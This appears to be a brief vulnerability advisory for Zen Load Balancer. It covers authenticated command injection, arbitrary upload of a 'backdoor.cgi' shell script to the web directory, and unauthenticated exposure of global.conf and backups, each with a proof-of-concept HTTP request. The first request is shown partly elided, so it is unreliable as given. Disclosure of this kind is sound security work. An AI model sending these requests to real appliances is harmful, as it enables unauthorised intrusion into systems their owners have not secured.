### Critical Vulnerability Information #### 1. Arbitrary Command Execution (Requires Authentication) - **Affected Versions**: v2.0 and v3.0-rc1 - **Vulnerability Description**: Attackers can execute arbitrary commands via the `taillog` parameter in the `content2.cgi` file after authentication. - **PoC**: ```bash GET /index.cgi?sid=2&zlbtag=modules%3D2%3BMOD%3D1%3A44444... e%3Bzlbash%3Dtaillog%20Action%3DSetLog%20HTTP/1.1 Host: zenloadbalancer-host Authorization: Basic YWRtaW46QWRtaW4= ``` #### 2. Arbitrary File Upload (Requires Authentication) - **Vulnerability Description**: The `upload.cgi` file allows uploading arbitrary files. - **PoC**: ```bash POST /upload.cgi HTTP/1.1 Host: zenloadbalancer-host Content-Type: multipart/form-data; boundary=---------------------------1178295032680 Content-Length: 905 -----------------------------1178295032680 Content-Disposition: form-data; name="file"; filename="./www/control/backdoor.cgi" Content-type: application/octet-stream #!/bin/sh echo "Content-type: text/html" echo "" echo "" echo "Hello World" echo "" -----------------------------1178295032680-- ``` #### 3. Information Disclosure (No Authentication Required) - **Vulnerability Description**: The `global.conf` file discloses full filesystem paths, internal network IP addresses, and software version. The `backup` directory may contain backups of web server configurations. - **PoC**: ```bash https://zenloadbalancer-host-444/cgi-bin/global.conf https://zenloadbalancer-host-444/backup/ ``` #### References - OWASP: Information Leakage - OWASP: Code Injection